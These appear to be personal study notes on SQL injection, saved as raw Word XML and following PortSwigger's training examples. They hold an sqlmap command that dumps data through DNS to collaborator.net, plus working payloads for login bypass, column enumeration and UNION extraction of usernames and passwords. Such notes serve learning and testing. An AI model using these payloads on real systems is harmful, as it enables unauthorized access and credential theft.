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E5CB" w14:textId="1A7EA56C" w:rsidR="00384A1B" w:rsidRPr="00384A1B" w:rsidRDefault="00384A1B" w:rsidP="00DE5DBE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r request --level=5--risk=3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>--batch --dns-domain=</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>collaborator.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p ‘username’</w:t>
      </w:r>
      <w:r w:rsidR="00C847F2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2977D1" w14:textId="77777777" w:rsidR="00384A1B" w:rsidRPr="00384A1B" w:rsidRDefault="00384A1B" w:rsidP="00DE5DBE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B6BF6F" w14:textId="0AA65C24" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00C847F2" w:rsidP="00DE5DBE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00D91F77" w:rsidRPr="00384A1B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B1D03FE" w14:textId="55D7D13B" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00D91F77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Detect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40733EDD" w14:textId="3FEC6B5F" w:rsidR="002F780D" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="00D91F77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auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">- use </w:t>
      </w:r>
      <w:r w:rsidR="00267AF4" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">(active) </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382B473" w14:textId="02885BAF" w:rsidR="002F780D" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="00D91F77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auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>- submit ‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C9DF7" w14:textId="1A6DCCE1" w:rsidR="001A50BC" w:rsidRPr="00384A1B" w:rsidRDefault="001A50BC" w:rsidP="00D91F77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auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>- submit 1+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33051D" w14:textId="25DAEF5A" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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Retrieving hidden data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3B57A" w14:textId="3EA41CFC" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F7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https://insecure-website.com/products?category=Gifts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABFAFB1" w14:textId="41A3DFFB" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F7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 xml:space="preserve">SELECT * FROM products WHERE category = 'Gifts' AND </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBC29AA" w14:textId="00973A66" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A81426" w14:textId="7609ED4A" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77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Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B6EEC" w14:textId="523A0E17" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F7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https://insecure-website.com/products?category=</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>Gifts'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998258B" w14:textId="3E130F9D" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F7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SELECT * FROM products WHERE category = '</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>Gifts'--</w:t>
      </w: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 AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613446D8" w14:textId="2D8EB3B9" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7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5548"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D91F77" w:rsidRPr="00384A1B" w14:paraId="4CB596D9" w14:textId="77777777" w:rsidTr="00D91F77">
        <w:trPr>
          <w:trHeight w:val="341"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CE70434" w14:textId="77777777" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F7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0A9EDFBD" w14:textId="77777777" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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--comment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35991489" w14:textId="1FF1643B" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D91F77" w:rsidRPr="00384A1B" w14:paraId="04F59FB5" w14:textId="77777777" w:rsidTr="00D91F77">
        <w:trPr>
          <w:trHeight w:val="588"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D68DCD2" w14:textId="77777777" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F7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Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1101239E" w14:textId="77777777" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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--comment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br/>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AEC43E5" w14:textId="0BFA00E6" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D91F77" w:rsidRPr="00384A1B" w14:paraId="51797FF1" w14:textId="77777777" w:rsidTr="00D91F77">
        <w:trPr>
          <w:trHeight w:val="854"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DFC8B70" w14:textId="77777777" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F7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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C7E39BB" w14:textId="3564ACD4" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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--comment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br/>
              <w:t>/*comment*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D91F77" w:rsidRPr="00384A1B" w14:paraId="3C1ABB19" w14:textId="77777777" w:rsidTr="00D91F77">
        <w:trPr>
          <w:trHeight w:val="930"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2E258E" w14:textId="73C01061" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F7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2E638CBB" w14:textId="4C5476C9" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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#comment</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:br/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-- comment</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>[space after the double dash</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="de-DE"/>
              </w:rPr>
              <w:br/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/*comment*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56917F38" w14:textId="26CA7E55" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415D4770" w14:textId="68805058" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F7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https://insecure-website.com/products?category=</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>Gifts'+OR+1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C0B866" w14:textId="750CC94C" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F7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SELECT * FROM products WHERE category = '</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>Gifts' OR 1=1--</w:t>
      </w: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 AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C1C1F" w14:textId="5C7FB1FE" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01587C1F" w14:textId="77777777" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00D91F77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Subverting application logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A35C6" w14:textId="372E7D20" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1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SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032B5C3" w14:textId="0956CD63" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE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SELECT * FROM users WHERE username = '</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>administrator'--</w:t>
      </w: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 AND password = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA09679" w14:textId="4AB9644B" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E197BEB" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DBE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Retrieving data from other database tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45495DE6" w14:textId="2AA4136D" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8684B8" w14:textId="0D82FE22" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE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SELECT name, description FROM products WHERE category = 'Gifts'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232A4236" w14:textId="2E222FCC" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/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FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>Gifts' UNION SELECT username, password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1859B0D8" w14:textId="43E21ABF" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713E0871" w14:textId="56511F4D" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE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same number of columns and compatible data types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9FC3B" w14:textId="6D0E0BD1" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D84937F" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DBE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Determining the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EDC94E" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DB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ORDER BY 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150AF05" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DB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ORDER BY 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F572C0E" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DB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ORDER BY 3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D71B9A" w14:textId="5E853B6F" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DB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etc. increasing until an error occurs (or no results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C17E2" w14:textId="053D1318" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A47A2DF" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DB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UNION SELECT NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19401437" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DB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UNION SELECT NULL,NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54353B" w14:textId="77777777" w:rsidR="00DE5DBE" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00DE5DB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UNION SELECT NULL,NULL,NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166682B7" w14:textId="13007393" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00DE5DBE" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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etc. increasing until an error occurs (or no results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F3692" w14:textId="723737AD" w:rsidR="002F780D" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="002F780D">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>For Oracle database</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B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 xml:space="preserve">: ' UNION SELECT NULL FROM </w:t>
      </w:r>
      <w:r w:rsidR="00065FC4" w:rsidRPr="00384A1B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dual</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12653A1C" w14:textId="77777777" w:rsidR="002F780D" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="002F780D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lastRenderedPageBreak/>
        <w:t>Finding columns with a useful data type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA98FE" w14:textId="77777777" w:rsidR="002F780D" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="002F780D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UNION SELECT 'a',NULL,NULL,NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC032B" w14:textId="77777777" w:rsidR="002F780D" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="002F780D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UNION SELECT NULL,'a',NULL,NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D2599E" w14:textId="77777777" w:rsidR="002F780D" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="002F780D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UNION SELECT NULL,NULL,'a',NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269FFEF" w14:textId="60C4E9CC" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D" w:rsidP="002F780D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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 UNION SELECT NULL,NULL,NULL,'a'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486A7405" w14:textId="36F1D196" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D485E4" w14:textId="39C8D11B" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="002F780D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If no error occurs, the column is of string data type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3638F90C" w14:textId="36AA6160" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBAE892" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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Retrieving multiple values within a single column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41666DE0" w14:textId="1084C532" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25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 UNION SELECT NULL, username || '~' || password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0605A06B" w14:textId="4682270D" w:rsidR="00D91F77" w:rsidRPr="00384A1B" w:rsidRDefault="00D91F77" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A210534" w14:textId="533C7D69" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>String concatenation: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372"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w14:paraId="32048ACD" w14:textId="77777777" w:rsidTr="00CC3B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="771ED15F" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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745312C8" w14:textId="77777777" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00CC3B25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'foo'||'bar'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w14:paraId="4DB34948" w14:textId="77777777" w:rsidTr="00CC3B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
